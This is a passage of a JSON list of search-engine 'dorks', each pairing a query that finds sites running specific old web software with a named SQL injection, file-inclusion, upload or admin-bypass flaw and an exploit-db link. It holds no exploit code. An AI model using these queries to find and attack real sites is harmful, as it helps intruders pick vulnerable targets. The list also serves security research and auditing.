Sniggabo CMS\" inurl:article.php?id", "long description": "Sniggabo CMS (article.php id) Remote SQL Injection: http://www.exploit-db.com/exploits/8933", "submited": "2010-11-15", "request": "\"powered by Sniggabo CMS\" inurl:article.php?id", "id": 2255}, {"short description": "inurl:\"tr.php?id=\" Short Url &amp; Url Tracker", "long description": "YourFreeWorld Short Url &amp; Url Tracker (id) SQL Injection Vuln - CVE: 2008-4885: http://www.exploit-db.com/exploits/6940", "submited": "2010-11-15", "request": "inurl:\"tr.php?id=\" Short Url &amp; Url Tracker", "id": 2256}, {"short description": "powered by AirvaeCommerce 3.0", "long description": "AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: http://www.exploit-db.com/exploits/5689", "submited": "2010-11-15", "request": "powered by AirvaeCommerce 3.0", "id": 2257}, {"short description": "inurl: \"tops_top.php? id_cat =\"", "long description": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: http://www.exploit-db.com/exploits/6044", "submited": "2010-11-15", "request": "inurl: \"tops_top.php? id_cat =\"", "id": 2258}, {"short description": "PHPEmailManager", "long description": "PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: http://www.exploit-db.com/exploits/9470", "submited": "2010-11-15", "request": "PHPEmailManager", "id": 2259}, {"short description": "\"Powered By 0DayDB v2.3\"", "long description": "0DayDB 2.3 (delete id) Remote Admin Bypass: http://www.exploit-db.com/exploits/4896", "submited": "2010-11-15", "request": "\"Powered By 0DayDB v2.3\"", "id": 2260}, {"short description": "\"Powered by ExBB \"", "long description": "ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: http://www.exploit-db.com/exploits/2273", "submited": "2010-11-15", "request": "\"Powered by ExBB \"", "id": 2261}, {"short description": "\"Powered by Locazolist Copyright 2006\"", "long description": "LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: http://www.exploit-db.com/exploits/3073", "submited": "2010-11-15", "request": "\"Powered by Locazolist Copyright 2006\"", "id": 2262}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7885", "submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2264}, {"short description": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "long description": "Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/10597", "submited": "2010-11-15", "request": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "id": 2265}, {"short description": "\"txx cms\"", "long description": "Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: http://www.exploit-db.com/exploits/4381", "submited": "2010-11-15", "request": "\"txx cms\"", "id": 2266}, {"short description": "Powered by: XP Book v3.0", "long description": "XP Book v3.0 login Admin: http://www.exploit-db.com/exploits/10621", "submited": "2010-11-15", "request": "Powered by: XP Book v3.0", "id": 2267}, {"short description": "\"Powered by ispCP Omega\"", "long description": "ispCP Omega 1.0.4 Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11681", "submited": "2010-11-15", "request": "\"Powered by ispCP Omega\"", "id": 2268}, {"short description": "inurl:\"printer.asp?forum=\"", "long description": "ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: http://www.exploit-db.com/exploits/4609", "submited": "2010-11-15", "request": "inurl:\"printer.asp?forum=\"", "id": 2269}, {"short description": "inurl:\"com_ownbiblio\" catalogue", "long description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: http://www.exploit-db.com/exploits/6730", "submited": "2010-11-15", "request": "inurl:\"com_ownbiblio\" catalogue", "id": 2270}, {"short description": "\"This site is powered by CMS Made Simple version 1.\"", "long description": "CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: http://www.exploit-db.com/exploits/9407", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple version 1.\"", "id": 2271}, {"short description": "\"CMS Webmanager-pro\"", "long description": "CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: http://www.exploit-db.com/exploits/5641", "submited": "2010-11-15", "request": "\"CMS Webmanager-pro\"", "id": 2272}, {"short description": "inurl:\"/geeklog/\"", "long description": "GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15277", "submited": "2010-11-15", "request": "inurl:\"/geeklog/\"", "id": 2274}, {"short description": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "long description": "Jax Calendar 1.34 Remote Admin Access: http://www.exploit-db.com/exploits/10835", "submited": "2010-11-15", "request": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "id": 2276}, {"short description": "allinurl: \"index php p shop\"categ", "long description": "Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5412", "submited": "2010-11-15", "request": "allinurl: \"index php p shop\"categ", "id": 2277}, {"short description": "Powered by Platinum 7.6.b.5", "long description": "PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: http://www.exploit-db.com/exploits/4563", "submited": "2010-11-15", "request": "Powered by Platinum 7.6.b.5", "id": 2278}, {"short description": "Rash Version: 1.2.1", "long description": "RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8433", "submited": "2010-11-15", "request": "Rash Version: 1.2.1", "id": 2280}, {"short description": "Powered by: mevin productions", "long description": "Basic PHP Events Lister 2 Add Admin: http://www.exploit-db.com/exploits/10515", "submited": "2010-11-15", "request": "Powered by: mevin productions", "id": 2281}, {"short description": "inurl:/webCal3_detail.asp?event_id=", "long description": "WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability - CVE: 2009-1945: http://www.exploit-db.com/exploits/8857", "submited": "2010-11-15", "request": "inurl:/webCal3_detail.asp?event_id=", "id": 2282}, {"short description": "inurl:classifieds/view.php?category=", "long description": "YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: http://www.exploit-db.com/exploits/6945", "submited": "2010-11-15", "request": "inurl:classifieds/view.php?category=", "id": 2284}, {"short description": "\"Signkorn Guestbook 1.3\"", "long description": "Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: http://www.exploit-db.com/exploits/2354", "submited": "2010-11-15", "request": "\"Signkorn Guestbook 1.3\"", "id": 2285}, {"short description": "inurl:\"catalog/product/detail.php?cat=\"", "long description": "Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: http://www.exploit-db.com/exploits/12467", "submited": "2010-11-15", "request": "inurl:\"catalog/product/detail.php?cat=\"", "id": 2287}, {"short description": "inurl: user_info.php?user_id= \"  Or  \" inurl: index.php?catid= \"", "long description": "Free Advertisment cms (user_info.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12572", "submited": "2010-11-15", "request": "inurl: user_info.php?user_id= \"  Or  \" inurl: index.php?catid= \"", "id": 2288}, {"short description": "Powered by:Traidnt Gallery Version 1.0.", "long description": "Traidnt Gallery add Admin: http://www.exploit-db.com/exploits/10629", "submited": "2010-11-15", "request": "Powered by:Traidnt Gallery Version 1.0.", "id": 2289}, {"short description": "inurl:\"powered by eggblog\"", "long description": "Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: http://www.exploit-db.com/exploits/1842", "submited": "2010-11-15", "request": "inurl:\"powered by eggblog\"", "id": 2290}, {"short description": "\"pForum 1.30\"", "long description": "pForum 1.30 (showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: http://www.exploit-db.com/exploits/6442", "submited": "2010-11-15", "request": "\"pForum 1.30\"", "id": 2291}, {"short description": "Powered By AJ Auction", "long description": "AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: http://www.exploit-db.com/exploits/6561", "submited": "2010-11-15", "request": "Powered By AJ Auction", "id": 2292}, {"short description": "faqview.asp?key", "long description": "Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: http://www.exploit-db.com/exploits/2385", "submited": "2010-11-15", "request": "faqview.asp?key", "id": 2293}, {"short description": "\"Powered by: MFH v1\"", "long description": "Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: http://www.exploit-db.com/exploits/5598", "submited": "2010-11-15", "request": "\"Powered by: MFH v1\"", "id": 2295}, {"short description": "inurl:\"com_beamospetition\"", "long description": "Joomla Component (com_beamospetition) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14502", "submited": "2010-11-15", "request": "inurl:\"com_beamospetition\"", "id": 2296}, {"short description": "intitle: phpBazar-AdminPanel", "long description": "phpBazar admin Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14439", "submited": "2010-11-15", "request": "intitle: phpBazar-AdminPanel", "id": 2297}, {"short description": "\"Powered By 4smart\"", "long description": "Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9282", "submited": "2010-11-15", "request": "\"Powered By 4smart\"", "id": 2298}, {"short description": "allinurl: \"index.php?showlink\"links", "long description": "Koobi Pro 6.25 links Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5411", "submited": "2010-11-15", "request": "allinurl: \"index.php?showlink\"links", "id": 2299}, {"short description": "\"Aurora CMS\"", "long description": "Aurora CMS Remote SQL Injection: http://www.exploit-db.com/exploits/10609", "submited": "2010-11-15", "request": "\"Aurora CMS\"", "id": 2302}, {"short description": "inurl :/PhotoCart/", "long description": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: http://www.exploit-db.com/exploits/2817", "submited": "2010-11-15", "request": "inurl :/PhotoCart/", "id": 2303}, {"short description": "\"Powered by GetMyOwnArcade\"", "long description": "GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: http://www.exploit-db.com/exploits/4291", "submited": "2010-11-15", "request": "\"Powered by GetMyOwnArcade\"", "id": 2305}, {"short description": "Powered By :  PersianBB.com", "long description": "PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6858", "submited": "2010-11-15", "request": "Powered By :  PersianBB.com", "id": 2306}, {"short description": "alegrocart", "long description": "Alegro 1.2.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12278", "submited": "2010-11-15", "request": "alegrocart", "id": 2307}, {"short description": "inurl:/hbcms/php/", "long description": "HB CMS 1.7 SQL Injection: http://www.exploit-db.com/exploits/9835", "submited": "2010-11-15", "request": "inurl:/hbcms/php/", "id": 2308}, {"short description": "\"Powered by Simple PHP Text newsletter\"", "long description": "Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: http://www.exploit-db.com/exploits/7813", "submited": "2010-11-15", "request": "\"Powered by Simple PHP Text newsletter\"", "id": 2309}, {"short description": "inurl:\"list.php?lcat_id=\"", "long description": "D-Tendencia Bt 2008 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10494", "submited": "2010-11-15", "request": "inurl:\"list.php?lcat_id=\"", "id": 2313}, {"short description": "allinurl: \"com_estateagent\"", "long description": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: http://www.exploit-db.com/exploits/5016", "submited": "2010-11-15", "request": "allinurl: \"com_estateagent\"", "id": 2314}, {"short description": "powered by Php Blue Dragon Platinum", "long description": "Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: http://www.exploit-db.com/exploits/1779", "submited": "2010-11-15", "request": "powered by Php Blue Dragon Platinum", "id": 2315}, {"short description": "Designed and Developed by karkia  E-commerce", "long description": "E-commerce Group (cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12696", "submited": "2010-11-15", "request": "Designed and Developed by karkia  E-commerce", "id": 2316}, {"short description": "\"hlstats.php?mode=dailyawardinfo&amp;award=\" hlstatsx", "long description": "HLstatsX v1.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10850", "submited": "2010-11-15", "request": "\"hlstats.php?mode=dailyawardinfo&amp;award=\" hlstatsx", "id": 2317}, {"short description": "Powered by Plogger!", "long description": "Plogger Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/14636", "submited": "2010-11-15", "request": "Powered by Plogger!", "id": 2318}, {"short description": ":intitle:\"A Better ASP User Gallery\"", "long description": "http://www.exploit-db.com/exploits/8012", "submited": "2010-11-15", "request": "", "id": 2320}, {"short description": "\"Powered by DZcms\"", "long description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7722", "submited": "2010-11-15", "request": "\"Powered by DZcms\"", "id": 2321}, {"short description": "inurl:\"com_event\"", "long description": "Joomla Component com_event Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12633", "submited": "2010-11-15", "request": "inurl:\"com_event\"", "id": 2323}, {"short description": "Help Desk Software by Kayako SupportSuite v3.70.02", "long description": "Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: http://www.exploit-db.com/exploits/14392", "submited": "2010-11-15", "request": "Help Desk Software by Kayako SupportSuite v3.70.02", "id": 2324}, {"short description": "inurl:\"/alternate_profiles/\"", "long description": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: http://www.exploit-db.com/exploits/6849", "submited": "2010-11-15", "request": "inurl:\"/alternate_profiles/\"", "id": 2326}, {"short description": "\"This website is powered by Mobius\"", "long description": "Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: http://www.exploit-db.com/exploits/6138", "submited": "2010-11-15", "request": "\"This website is powered by Mobius\"", "id": 2330}, {"short description": "intitle:WEBEYES GUEST BOOK     inurl:.asp?id=", "long description": "WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: http://www.exploit-db.com/exploits/8859", "submited": "2010-11-15", "request": "intitle:WEBEYES GUEST BOOK     inurl:.asp?id=", "id": 2331}, {"short description": "\"visiteurs v2.0\"", "long description": "Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: http://www.exploit-db.com/exploits/2449", "submited": "2010-11-15", "request": "\"visiteurs v2.0\"", "id": 2332}, {"short description": "inurl:\"com_portfol\"", "long description": "Joomla Component com_portfol SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10844", "submited": "2010-11-15", "request": "inurl:\"com_portfol\"", "id": 2333}, {"short description": "\"Powered by ZeeMatri\"", "long description": "ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: http://www.exploit-db.com/exploits/7072", "submited": "2010-11-15", "request": "\"Powered by ZeeMatri\"", "id": 2334}, {"short description": "inurl:tr.php?id= Banner", "long description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: http://www.exploit-db.com/exploits/6276", "submited": "2010-11-15", "request": "inurl:tr.php?id= Banner", "id": 2335}, {"short description": "Powered By: 4images 1.7.1", "long description": "4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: http://www.exploit-db.com/exploits/10572", "submited": "2010-11-15", "request": "Powered By: 4images 1.7.1", "id": 2336}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7898", "submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2339}, {"short description": "intitle:USP FOSS Distribution", "long description": "USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: http://www.exploit-db.com/exploits/3794", "submited": "2010-11-15", "request": "intitle:USP FOSS Distribution", "id": 2340}, {"short description": "\"powered by dataface\" \"powered by xataface\"", "long description": "Xataface Admin Auth Bypass Vulnerability: http://www.exploit-db.com/exploits/11852", "submited": "2010-11-15", "request": "\"powered by dataface\" \"powered by xataface\"", "id": 2341}, {"short description": "inurl:\"vbplaza.php?do=\"", "long description": "vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: http://www.exploit-db.com/exploits/8784", "submited": "2010-11-15", "request": "inurl:\"vbplaza.php?do=\"", "id": 2344}, {"short description": "allintext:\"Powered by: TotalCalendar\"", "long description": "TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: http://www.exploit-db.com/exploits/4130", "submited": "2010-11-15", "request": "allintext:\"Powered by: TotalCalendar\"", "id": 2346}, {"short description": "Powered by PHP Dir Submit - Directory Submission Script", "long description": "PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: http://www.exploit-db.com/exploits/9484", "submited": "2010-11-15", "request": "Powered by PHP Dir Submit - Directory Submission Script", "id": 2347}, {"short description": "intitle:\"MAXSITE\"", "long description": "CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: http://www.exploit-db.com/exploits/5676", "submited": "2010-11-15", "request": "intitle:\"MAXSITE\"", "id": 2348}, {"short description": "Power with ecsportal rel 6.5", "long description": "ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8848", "submited": "2010-11-15", "request": "Power with ecsportal rel 6.5", "id": 2350}, {"short description": "inurl:\"list.php?c=\"", "long description": "Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: http://www.exploit-db.com/exploits/5384", "submited": "2010-11-15", "request": "inurl:\"list.php?c=\"", "id": 2351}, {"short description": "inurl:\"weblink_cat_list.php?bcat_id=\"", "long description": "WHMCompleteSolution CMS sql Injection Vulnerability: http://www.exploit-db.com/exploits/10493", "submited": "2010-11-15", "request": "inurl:\"weblink_cat_list.php?bcat_id=\"", "id": 2352}, {"short description": "Powered by YaBBSM V2.5.0 Based on YABB SE", "long description": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: http://www.exploit-db.com/exploits/2553", "submited": "2010-11-15", "request": "Powered by YaBBSM V2.5.0 Based on YABB SE", "id": 2354}, {"short description": "\"Powered by     YDC\"", "long description": "YDC (kdlist.php cat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6811", "submited": "2010-11-15", "request": "\"Powered by     YDC\"", "id": 2355}, {"short description": "Powered by emuCMS", "long description": "emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: http://www.exploit-db.com/exploits/5878", "submited": "2010-11-15", "request": "Powered by emuCMS", "id": 2356}, {"short description": "intitle:\"Rx08.ii36B.Rv\"", "long description": "RapidLeech Scripts Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/14430", "submited": "2010-11-15", "request": "intitle:\"Rx08.ii36B.Rv\"", "id": 2359}, {"short description": "allinurl:\"/lildbi/\"", "long description": "LILDBI Shell Upload Vulnerability: http://www.exploit-db.com/exploits/14443", "submited": "2010-11-15", "request": "allinurl:\"/lildbi/\"", "id": 2360}, {"short description": "intext:\"Design by BB Media.Org\"", "long description": "BBMedia Design's (news_more.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12718", "submited": "2010-11-15", "request": "intext:\"Design by BB Media.Org\"", "id": 2361}, {"short description": "calendar.asp?eventdetail", "long description": "AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: http://www.exploit-db.com/exploits/5850", "submited": "2010-11-15", "request": "calendar.asp?eventdetail", "id": 2362}, {"short description": "\"Copyrights 2005 Belgische Federale Overheidsdiensten\"", "long description": "Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: http://www.exploit-db.com/exploits/5624", "submited": "2010-11-15", "request": "\"Copyrights 2005 Belgische Federale Overheidsdiensten\"", "id": 2363}, {"short description": "Powered by Multi Website 1.5", "long description": "Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: http://www.exploit-db.com/exploits/9344", "submited": "2010-11-15", "request": "Powered by Multi Website 1.5", "id": 2364}, {"short description": "Powered by iScripts VisualCaster", "long description": "SQli Vulnerability in iScripts VisualCaster - CVE: 2010-2853: http://www.exploit-db.com/exploits/12451", "submited": "2010-11-15", "request": "Powered by iScripts VisualCaster", "id": 2365}, {"short description": "JBC explorer [ by Psykokwak &amp; XaV ]", "long description": "Explorer V7.20 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10566", "submited": "2010-11-15", "request": "JBC explorer [ by Psykokwak &amp; XaV ]", "id": 2366}, {"short description": "\"Powered by DesClub.com - phpLinkat\"", "long description": "phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: http://www.exploit-db.com/exploits/6140", "submited": "2010-11-15", "request": "\"Powered by DesClub.com - phpLinkat\"", "id": 2367}, {"short description": "Powered by: Zanfi Solutions", "long description": "Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: http://www.exploit-db.com/exploits/6423", "submited": "2010-11-15", "request": "Powered by: Zanfi Solutions", "id": 2368}, {"short description": "inurl:\"com_equipment\"", "long description": "Joomla Component (com_equipment) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14655", "submited": "2010-11-15", "request": "inurl:\"com_equipment\"", "id": 2369}, {"short description": "\"Everyone should be on TV! Now you can upload 2 TV\"", "long description": "Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: http://www.exploit-db.com/exploits/6147", "submited": "2010-11-15", "request": "\"Everyone should be on TV! Now you can upload 2 TV\"", "id": 2371}, {"short description": "\" created by creato.biz \"", "long description": "Creato Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12807", "submited": "2010-11-15", "request": "\" created by creato.biz \"", "id": 2376}, {"short description": "\"Powered by: Southburn\"", "long description": "southburn Web (products.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11430", "submited": "2010-11-15", "request": "\"Powered by: Southburn\"", "id": 2378}, {"short description": "\"powered by Blue Dove Web Design\"", "long description": "Blue Dove Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11360", "submited": "2010-11-15", "request": "\"powered by Blue Dove Web Design\"", "id": 2380}, {"short description": "infusions/raidtracker_panel/thisraidprogress.php?", "long description": "PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: http://www.exploit-db.com/exploits/6682", "submited": "2010-11-15", "request": "infusions/raidtracker_panel/thisraidprogress.php?", "id": 2381}, {"short description": "inurl:\"phpsecurepages\"", "long description": "phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2452", "submited": "2010-11-15", "request": "inurl:\"phpsecurepages\"", "id": 2383}, {"short description": "allinurl: \"index.php?mod=galerie\"action=gal", "long description": "KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: http://www.exploit-db.com/exploits/5350", "submited": "2010-11-15", "request": "allinurl: \"index.php?mod=galerie\"action=gal", "id": 2384}, {"short description": "Site cree avec GuppY v4.5.18", "long description": "GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: http://www.exploit-db.com/exploits/12484", "submited": "2010-11-15", "request": "Site cree avec GuppY v4.5.18", "id": 2387}, {"short description": "intext:\"Powered by WSN Links Basic Edition\"", "long description": "WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: http://www.exploit-db.com/exploits/4209", "submited": "2010-11-15", "request": "intext:\"Powered by WSN Links Basic Edition\"", "id": 2388}, {"short description": "inurl:\"/index.php?option=com_rsfiles\"", "long description": "Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: http://www.exploit-db.com/exploits/4307", "submited": "2010-11-15", "request": "inurl:\"/index.php?option=com_rsfiles\"", "id": 2389}, {"short description": "Powered By AstroSPACES", "long description": "AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: http://www.exploit-db.com/exploits/6758", "submited": "2010-11-15", "request": "Powered By AstroSPACES", "id": 2391}, {"short description": "Powered by FluentCMS", "long description": "FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: http://www.exploit-db.com/exploits/5509", "submited": "2010-11-15", "request": "Powered by FluentCMS", "id": 2393}, {"short description": "inurl:dpage.php?docID", "long description": "The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: http://www.exploit-db.com/exploits/5610", "submited": "2010-11-15", "request": "inurl:dpage.php?docID", "id": 2394}, {"short description": "inurl:\"index.php?option=com_iproperty\"", "long description": "Joomla Component (com_iproperty) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14450", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_iproperty\"", "id": 2397}, {"short description": "\"Powered by WebStudio eCatalogue\"", "long description": "WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: http://www.exploit-db.com/exploits/7223", "submited": "2010-11-15", "request": "\"Powered by WebStudio eCatalogue\"", "id": 2398}, {"short description": "powered by JAF CMS 2004 - 2006", "long description": "JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: http://www.exploit-db.com/exploits/2474", "submited": "2010-11-15", "request": "powered by JAF CMS 2004 - 2006", "id": 2400}, {"short description": "\"Powered by NovaBoard v1.1.2\"", "long description": "NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: http://www.exploit-db.com/exploits/11278", "submited": "2010-11-15", "request": "\"Powered by NovaBoard v1.1.2\"", "id": 2402}, {"short description": "inurl:/downlot.php?file=", "long description": "Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability - CVE: 2010-2018: http://www.exploit-db.com/exploits/12651", "submited": "2010-11-15", "request": "inurl:/downlot.php?file=", "id": 2404}, {"short description": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "long description": "Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: http://www.exploit-db.com/exploits/2221", "submited": "2010-11-15", "request": "\"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"", "id": 2405}, {"short description": "inurl:treplies.asp?message=     intitle:ASP Talk", "long description": "ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7378", "submited": "2010-11-15", "request": "inurl:treplies.asp?message=     intitle:ASP Talk", "id": 2407}, {"short description": "inurl:\"read.asp?fID=\"", "long description": "JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: http://www.exploit-db.com/exploits/5753", "submited": "2010-11-15", "request": "inurl:\"read.asp?fID=\"", "id": 2408}, {"short description": "\"MidiCart PHP Database Management\"", "long description": "MidiCart PHP,ASP Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12636", "submited": "2010-11-15", "request": "\"MidiCart PHP Database Management\"", "id": 2409}, {"short description": "\"Powered By The Black Lily 2007\"", "long description": "Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4444", "submited": "2010-11-15", "request": "\"Powered By The Black Lily 2007\"", "id": 2410}, {"short description": "inurl:\"simpleblog3\"", "long description": "SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7232", "submited": "2010-11-15", "request": "inurl:\"simpleblog3\"", "id": 2411}, {"short description": "allinurl:/m2f_usercp.php?", "long description": "mail2forum phpBB Mod 1.2 (m2f_root_path) Remote Include Vulns - CVE: 2006-3735: http://www.exploit-db.com/exploits/2019", "submited": "2010-11-15", "request": "allinurl:/m2f_usercp.php?", "id": 2412}, {"short description": "powered by Dreampics Builder", "long description": "Dreampics Builder (page) Remote SQL Injection Vulnerability - CVE: 2008-3119: http://www.exploit-db.com/exploits/6034", "submited": "2010-11-15", "request": "powered by Dreampics Builder", "id": 2413}, {"short description": "inurl:\"classifide_ad.php\"", "long description": "AJ Auction 6.2.1 (classifide_ad.php) SQL Injection Vulnerability - CVE: 2008-5212: http://www.exploit-db.com/exploits/5591", "submited": "2010-11-15", "request": "inurl:\"classifide_ad.php\"", "id": 2414}, {"short description": "[ Web Wiz Forums version 9.64 [Free Express Edition] ]", "long description": "Web Wiz Forums v9.64 Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/10638", "submited": "2010-11-15", "request": "[ Web Wiz Forums version 9.64 [Free Express Edition] ]", "id": 2415}, {"short description": "inurl:/jobsearchengine/", "long description": "I-Net MLM Script Engine SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14080", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 2417}, {"short description": "allinurl:\"com_n-gallery\"", "long description": "Mambo Component n-gallery Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5980", "submited": "2010-11-15", "request": "allinurl:\"com_n-gallery\"", "id": 2419}, {"short description": "Copyright 2006 Flax Article Manager v1.1", "long description": "Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: http://www.exploit-db.com/exploits/7884", "submited": "2010-11-15", "request": "Copyright 2006 Flax Article Manager v1.1", "id": 2421}, {"short description": "inurl:com_pinboard", "long description": "Joomla Component com_pinboard Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/9011", "submited": "2010-11-15", "request": "inurl:com_pinboard", "id": 2424}, {"short description": "\"2005-2006 Powered by eSyndiCat Link Exchange Script\"", "long description": "eSyndiCat Link Exchange Script 2005-2006 SQL 